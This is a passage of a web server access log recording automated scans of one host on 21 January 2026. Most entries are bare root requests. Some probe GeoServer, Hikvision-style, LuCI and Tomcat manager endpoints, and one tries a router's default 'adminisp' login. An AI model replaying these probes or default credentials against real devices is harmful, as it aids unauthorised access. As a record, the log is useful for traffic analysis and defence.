204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:02:08:59 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:02:13:40 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.93] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:02:13:40 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.93] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:02:19:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[21/Jan/2026:02:21:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:02:22:07 +0000] 404 - GET http 91.82.83.208 "/backup/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:02:22:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:02:26:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:02:31:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:02:33:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.40] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:02:35:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:02:42:45 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:02:43:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 152.32.207.150] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:02:44:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 152.32.207.150] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[21/Jan/2026:02:44:20 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[21/Jan/2026:02:44:20 +0000] 404 - GET http 91.82.83.208 "/robots.txt" [Client 152.32.207.150] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[21/Jan/2026:02:44:20 +0000] 404 - GET http 91.82.83.208 "/sitemap.xml" [Client 152.32.207.150] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[21/Jan/2026:02:44:21 +0000] 404 - GET http 91.82.83.208 "/config.json" [Client 152.32.207.150] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[21/Jan/2026:02:45:40 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:02:49:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 66.240.223.240] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[21/Jan/2026:02:56:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:03:01:52 +0000] 400 - GET http 91.82.83.208 "/" [Client 3.134.148.59] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:04:19 +0000] 400 - GET http 91.82.83.208 "/" [Client 3.134.148.59] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:07:24 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=adminisp&psd=adminisp" [Client 182.119.5.101] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:03:07:48 +0000] 400 - - http localhost "-" [Client 3.134.148.59] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:03:10:51 +0000] 400 - - http localhost "-" [Client 3.134.148.59] [Length 0] [Gzip -] "-" "-" +[21/Jan/2026:03:13:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.130.150.80] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[21/Jan/2026:03:15:54 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 65.49.1.132] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:03:16:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:03:19:16 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:03:19:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:03:21:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:03:23:03 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:03:31:45 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:03:43:26 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:03:48:44 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.72" "-" +[21/Jan/2026:03:48:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:03:53:57 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 91.90.124.133] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:04:04:57 +0000] 200 - GET http 91.82.83.208 "/" [Client 101.57.173.52] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[21/Jan/2026:04:06:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:04:07:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 37.46.115.56] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:04:08:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:04:11:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:04:11:41 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 164.92.179.98] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:04:15:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:04:16:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:04:29:23 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:04:35:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:04:45:07 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:04:48:02 +0000] 404 - GET http 91.82.83.208 "/manager/html" [Client 84.105.19.130] [Length 122] [Gzip 1.35] "python-requests/2.27.1" "-" +[21/Jan/2026:04:53:36 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:04:56:25 +0000] 400 - GET http 91.82.83.208 "/" [Client 162.142.125.124] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[21/Jan/2026:04:56:28 +0000] 400 - - http localhost "-" [Client 162.142.125.124] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:04:58:36 +0000] 400 - GET http 91.82.83.208 "/wiki" [Client 162.142.125.124] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[21/Jan/2026:05:03:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:05:05:11 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:05:06:04 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:05:08:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:05:13:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:05:23:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:05:24:12 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:05:25:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:05:28:48 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:05:38:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:05:42:36 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:05:42:44 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:05:45:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.37] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:05:47:03 +0000] 200 - GET http 91.82.83.208 "/" [Client 147.185.133.12] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[21/Jan/2026:05:47:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:05:50:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:06:06:23 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:06:07:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:06:12:22 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:06:15:48 +0000] 404 - GET http 91.82.83.208 "/login" [Client 144.31.215.41] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[21/Jan/2026:06:15:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 144.31.215.41] [Length 568] [Gzip 1.86] "Mozilla/5.0" "-" +[21/Jan/2026:06:15:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 144.31.215.41] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:06:15:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 144.31.215.41] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:06:15:59 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:06:17:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:06:20:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.157.95.239] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[21/Jan/2026:06:31:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 203.198.86.80] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.1" "-" +[21/Jan/2026:06:39:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:06:39:44 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:06:42:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:06:43:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 88.135.86.252] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[21/Jan/2026:06:49:09 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:06:58:10 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:06:59:36 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:07:04:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:07:08:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:07:09:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:07:28:23 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:07:30:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:07:31:50 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:07:40:24 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.12.59.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" "-" +[21/Jan/2026:07:51:34 +0000] 400 - POST http 91.82.83.208 "/app/api/login" [Client 104.244.79.113] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/135.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:54:41 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:07:57:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:07:58:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:08:05:06 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:08:12:50 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:08:17:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.122] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:08:17:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.122] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:08:19:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:08:20:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:08:21:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.122] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:08:38:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:08:40:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 65.49.20.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.28 Safari/537.36" "-" +[21/Jan/2026:08:41:38 +0000] 404 - GET http 91.82.83.208 "/webui/" [Client 65.49.20.69] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0" "-" +[21/Jan/2026:08:43:04 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[21/Jan/2026:08:44:05 +0000] 404 - GET http 91.82.83.208 "/geoserver/web/" [Client 65.49.20.69] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.28 Safari/537.36" "-" +[21/Jan/2026:08:46:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" 